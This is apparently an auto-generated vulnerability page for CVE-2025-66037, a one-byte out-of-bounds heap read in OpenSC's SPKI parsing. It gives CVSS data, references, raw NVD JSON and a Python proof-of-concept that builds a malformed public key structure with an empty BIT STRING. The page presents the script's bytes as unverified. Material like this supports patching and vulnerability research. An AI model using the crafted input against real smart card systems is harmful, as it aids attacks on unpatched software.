Security Vulnerability Report
CVE-2025-66037 CVSS 3.9 LOW

CVE-2025-66037

Published: 2026-03-30 18:16:18
Last Modified: 2026-04-01 17:59:36

Description

OpenSC is an open source smart card tools and middleware. Prior to version 0.27.0, feeding a crafted input to the fuzz_pkcs15_reader harness causes OpenSC to perform an out-of-bounds heap read in the X.509/SPKI handling path. Specifically, sc_pkcs15_pubkey_from_spki_fields() allocates a zero-length buffer and then reads one byte past the end of that allocation. This issue has been patched in version 0.27.0.

CVSS Details

CVSS Score
3.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:* - VULNERABLE
OpenSC < 0.27.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import binascii

from asn1crypto import core, keys

# Proof of Concept for CVE-2025-66037
# This script constructs a malformed SPKI (SubjectPublicKeyInfo) structure that
# may trigger the out-of-bounds read described in the advisory.
# Note: actual exploitation requires a smart card reader environment using the
# OpenSC library (or the fuzz_pkcs15_reader harness named in the advisory).
#
# The bug involves a zero-length allocation followed by a read one byte past
# its end, so the structure below carries a zero-length public key BIT STRING.
#
# Conceptual DER layout:
#   SEQUENCE {
#     SEQUENCE { ... AlgorithmIdentifier ... }
#     BIT STRING { }   <-- zero-length contents here
#   }
#
# The exact trigger bytes are not reproduced here; this is the structural
# shape the advisory describes, not a verified crash input.


class LooseSubjectPublicKeyInfo(core.Sequence):
    """SPKI shape with an untyped BIT STRING for the key.

    keys.PublicKeyInfo insists on parsing the public_key field as an
    RSAPublicKey when the algorithm is rsaEncryption, which fails for empty
    content, so this loosely typed Sequence is used to emit the DER instead.
    """
    _fields = [
        ('algorithm', keys.PublicKeyAlgorithm),
        ('public_key', core.OctetBitString),
    ]


def build_malformed_spki():
    """Return DER bytes for an SPKI whose public key BIT STRING is empty."""
    spki = LooseSubjectPublicKeyInfo({
        # asn1crypto maps 'rsa' to the rsaEncryption OID and fills in the
        # NULL parameters that OID requires.
        'algorithm': {'algorithm': 'rsa'},
        # Empty byte string -> BIT STRING with zero content octets.
        'public_key': b'',
    })
    return spki.dump()


if __name__ == "__main__":
    poc_data = build_malformed_spki()
    print(f"Generated PoC DER data length: {len(poc_data)}")
    print(f"Hex dump: {binascii.hexlify(poc_data).decode('utf-8')}")
    print("This data should be fed to the fuzz_pkcs15_reader harness or a card.")

References

https://github.com/OpenSC/OpenSC/security/advisories/GHSA-m58q-rmjm-mmfx (Exploit, Vendor Advisory)
https://github.com/OpenSC/OpenSC/wiki/CVE-2025-66037 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66037", "sourceIdentifier": "[email protected]", "published": "2026-03-30T18:16:18.007", "lastModified": "2026-04-01T17:59:35.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSC is an open source smart card tools and middleware. Prior to version 0.27.0, feeding a crafted input to the fuzz_pkcs15_reader harness causes OpenSC to perform an out-of-bounds heap read in the X.509/SPKI handling path. Specifically, sc_pkcs15_pubkey_from_spki_fields() allocates a zero-length buffer and then reads one byte past the end of that allocation. This issue has been patched in version 0.27.0."}, {"lang": "es", "value": "OpenSC es un conjunto de herramientas y middleware de código abierto para tarjetas inteligentes. Antes de la versión 0.27.0, al introducir una entrada manipulada en el arnés fuzz_pkcs15_reader, OpenSC realiza una lectura de pila fuera de límites en la ruta de manejo de X.509/SPKI. Específicamente, sc_pkcs15_pubkey_from_spki_fields() asigna un búfer de longitud cero y luego lee un byte más allá del final de esa asignación. Este problema ha sido parcheado en la versión 0.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 3.9, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.5, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.27.0", "matchCriteriaId": "D890677F-5379-4587-B8E7-D38B02AD525A"}]}]}], "references": [{"url": "https://github.com/OpenSC/OpenSC/security/advisories/GHSA-m58q-rmjm-mmfx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/OpenSC/OpenSC/wiki/CVE-2025-66037", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}